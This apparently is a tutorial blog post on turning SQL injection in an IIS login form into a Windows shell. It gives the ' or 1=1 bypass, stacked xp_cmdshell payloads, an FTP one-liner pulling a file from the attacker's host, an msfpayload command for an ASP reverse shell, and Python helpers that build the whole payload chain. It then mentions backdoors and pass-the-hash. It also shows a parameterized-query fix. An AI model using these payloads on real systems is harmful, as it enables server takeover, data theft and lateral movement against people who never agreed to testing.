Basic SQLi to System Level Access

Prerequisites:

Understanding of SQL injection

From SQL Injection to System

Let's start my first tutorial off with SQL injection. If you do not know what SQLi is, please go to Google and do some research first.
The scenario below is fairly rare in practice (it needs the application's database login to hold sysadmin rights on SQL Server, and xp_cmdshell to be available), but it gives a good understanding of how SQL injection can be turned into access to the underlying host.

While I was out on a pentesting engagement last week I found an injection flaw in an application that was running on an older version of IIS. Through this flaw I was able to obtain SYSTEM-level access on the box, because the database service was running as a system-level account: commands launched through xp_cmdshell run with the privileges of the SQL Server service account, whatever that happens to be. I figured this would be a good tutorial to start with since there are no other SQLi tutorials on the site. Here is how I did it and the commands that were used.

The first thing I noticed was that the application would actually respond to the classic hi' or 1=1;-- string. For those who don't know, this is the most basic SQLi payload and the standard authentication-bypass test: the quote closes the username literal, or 1=1 makes the WHERE clause true for every row, the semicolon ends the statement, and -- comments out whatever the application appended after it. Because SQL Server executes stacked statements, anything placed between the semicolon and the comment marker runs as well, which is what every later step here relies on. The string was entered directly into the username text box exactly as it is typed above.
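To make the bypass concrete, here is an added example (not code from the original post) of the two ways the login check can be written, run against a constructed in-memory table. SQLite stands in for the SQL Server behind the write-up because it runs in-process and honours the same ' ... or 1=1 ... -- syntax; it does not run stacked statements, so the xp_cmdshell steps that follow could not be reproduced this way. The table, user and password are made up for the demonstration.

```python
import sqlite3

# Constructed stand-in for the application's user table (one made-up account).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def rendered_query(username, password):
    """The query text the database actually receives when the application
    builds it by string concatenation (the pattern the payload exploits)."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Concatenated query. Returns the usernames the WHERE clause matched; a
    non-empty list means 'logged in'. With hi' or 1=1;-- as the username the
    predicate is true for every row and the password check is commented out."""
    return [row[0] for row in conn.execute(rendered_query(username, password))]


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is passed as data and can
    never break out of its literal, so the payload is just an unknown user."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    payload = "hi' or 1=1;--"
    print(rendered_query(payload, "whatever"))
    print("vulnerable   :", vulnerable_login(make_db(), payload, "whatever"))
    print("parameterized:", safe_login(make_db(), payload, "whatever"))
```

The vulnerable version returns alice without knowing the password; the parameterized version returns nothing for the payload and only matches when the real credentials are supplied.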

Next I tested whether the xp_cmdshell extended stored procedure was enabled on the SQL Server (it is disabled by default on SQL Server 2005 and later, and executing it requires sysadmin rights). Sure enough it was, and here is the basic command I used:

' or 1=1;exec master..xp_cmdshell '"ipconfig" > c:\Inetpub\wwwroot\ipTest.txt';--

Next, in the browser I requested http://192.168.11.231/iptest.txt to make sure the file was there. It was: the server had run ipconfig and written its output into the text file, which verified that I could run commands on the box and read their output back through the web root.

Now for the good stuff. I then created an FTP script file like so:
' or 1=1;exec master..xp_cmdshell '"(echo open 192.168.11.204 21 & echo anonymous& echo anonymous& echo bin & echo get nu11.asp c:\Inetpub\wwwroot\nu11.asp & echo bye)" > c:\Inetpub\wwwroot\ftp.txt';--

If you notice, some of the echo commands have no space before the &. This is deliberate: cmd.exe writes everything up to the & into the file, so echo anonymous & would put anonymous followed by a trailing space into the script, the ftp client would send that as the credential, the transfer would fail, and the whole process would have to be started over.

Now for the upload. I entered this command to make the target pull the file from my anonymous FTP server (192.168.11.204) using the script file I had just created:
' or 1=1;exec master..xp_cmdshell '"ftp -s:c:\Inetpub\wwwroot\ftp.txt" > c:\Inetpub\wwwroot\trans.txt';--

Redirecting the output to trans.txt at the end of the ftp command captures the client's session (the commands from the script and the server's replies), so I could fetch it in the browser and verify that the upload was successful.
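The three xp_cmdshell steps above are all built from the same parts, and the quoting is where they usually go wrong. As an added example (not the author's tooling), the following Python helpers compose those injection strings so they can be checked before they go into the login form: single quotes inside the OS command are doubled for the T-SQL literal, the echo lines of the ftp -s: script are joined with a bare & so no trailing spaces end up in the script, and the output redirect into the web root is attached so each step can be verified over HTTP as described. Addresses, paths and the nu11.asp name are the ones from this write-up; the sp_configure payload for enabling xp_cmdshell is a generalisation, since here it was already on.

```python
# Added example: helpers that compose the stacked xp_cmdshell payloads used in
# this write-up. Not the author's tooling. Hosts, paths and the nu11.asp name
# come from the write-up; enabling xp_cmdshell via sp_configure is a
# generalisation (the author found it already enabled).

WEBROOT = r"c:\Inetpub\wwwroot"  # IIS default web root, used as the drop location
PREFIX = "' or 1=1;"              # closes the username literal and ends the statement


def tsql_literal(s):
    """Wrap s as a T-SQL string literal, doubling any embedded single quote so a
    quote inside the OS command cannot terminate the injected statement early."""
    return "'" + s.replace("'", "''") + "'"


def xp_cmdshell_payload(cmd, outfile="", prefix=PREFIX):
    """Injection string that runs cmd through xp_cmdshell. With outfile set, the
    command is quoted and its output redirected into the web root so the result
    can be read back over HTTP (the "ipconfig" > ipTest.txt trick above)."""
    if outfile:
        cmd = '"%s" > %s' % (cmd, outfile)
    return "%sexec master..xp_cmdshell %s;--" % (prefix, tsql_literal(cmd))


def enable_xp_cmdshell_payload(prefix=PREFIX):
    """xp_cmdshell is off by default on SQL Server 2005+; a sysadmin login can
    switch it on with sp_configure before the payloads above will work."""
    return (prefix + "exec sp_configure 'show advanced options',1;reconfigure;"
            "exec sp_configure 'xp_cmdshell',1;reconfigure;--")


def ftp_script_cmd(host, remote, local, user="anonymous", password="anonymous", port=21):
    """cmd.exe one-liner that echoes an ftp -s: script. Lines are joined with a
    bare '&': 'echo anonymous & echo ...' would write 'anonymous ' with a
    trailing space, which ftp.exe then sends as the credential."""
    lines = ["open %s %d" % (host, port), user, password, "bin",
             "get %s %s" % (remote, local), "bye"]
    return "(" + "&".join("echo " + line for line in lines) + ")"


def build_chain(attacker="192.168.11.204", remote="nu11.asp"):
    """The full sequence from the write-up, in order, as injection strings:
    prove command execution, drop the ftp script, run the transfer."""
    local = WEBROOT + "\\" + remote
    return [
        xp_cmdshell_payload("ipconfig", WEBROOT + r"\ipTest.txt"),
        xp_cmdshell_payload(ftp_script_cmd(attacker, remote, local), WEBROOT + r"\ftp.txt"),
        xp_cmdshell_payload("ftp -s:" + WEBROOT + r"\ftp.txt", WEBROOT + r"\trans.txt"),
    ]


if __name__ == "__main__":
    print(enable_xp_cmdshell_payload())
    for step in build_chain():
        print(step)
```

The first and third strings produced by build_chain are byte-for-byte the ipconfig and ftp -s: payloads shown above; the second differs from the hand-typed script only in that every & is written without surrounding spaces.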

If you are curious what nu11.asp is, here is the command used to generate it. An ASP file was chosen because that is the only type of file the server would execute when requested from the browser. (msfpayload and msfencode have since been replaced in Metasploit by msfvenom, which combines the two steps into one command.)

msfpayload windows/shell_reverse_tcp LHOST=192.168.11.204 LPORT=4444 R| msfencode -e x86/shikata_ga_nai -t asp > /tmp/nu11.asp

Now that my payload was on the server, I started a netcat listener with nc -lp 4444, went back to the browser, pointed it at the target machine and requested http://192.168.11.231/nu11.asp.
As you can see from the picture, it worked: the ASP page executed the reverse shell and connected back to my listener. Keep in mind that this shell runs with the privileges of the web server process that executed the ASP page (xp_cmdshell, by contrast, runs as the SQL Server service account), so confirm which account you have actually landed as.
Game over! At this point I was able to do anything I wanted: plant backdoors, run pass-the-hash against other machines on the network, create an admin user, anything.

Images: